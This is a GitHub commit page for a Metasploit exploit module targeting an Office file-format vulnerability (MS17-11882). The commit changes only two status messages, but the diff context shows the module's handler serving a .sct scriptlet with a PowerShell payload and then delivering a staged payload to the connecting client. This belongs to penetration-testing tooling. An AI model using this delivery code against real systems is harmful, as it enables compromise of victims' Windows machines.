Skip to content

Commit db4c0fc

Browse files
author
Austin
authored
spelling
1 parent fcea6fd commit db4c0fc

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/fileformat/office_ms17_11882.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -171,12 +171,12 @@ def gen_psh(url, *method)
171171

172172
def on_request_uri(cli, _request)
173173
if _request.raw_uri =~ /\.sct$/
174-
print_status("Handling initial request from #{cli.peerhost}")
174+
print_status("Handling request for .sct from #{cli.peerhost}")
175175
payload = gen_psh("#{get_uri}", "string")
176176
data = gen_sct_file(payload)
177177
send_response(cli, data, 'Content-Type' => 'text/plain')
178178
else
179-
print_status("Stage two requested, sending...")
179+
print_status("Delivering payload...")
180180
p = regenerate_payload(cli)
181181
data = cmd_psh_payload(p.encoded,
182182
payload_instance.arch.first,

0 commit comments

Comments
 (0)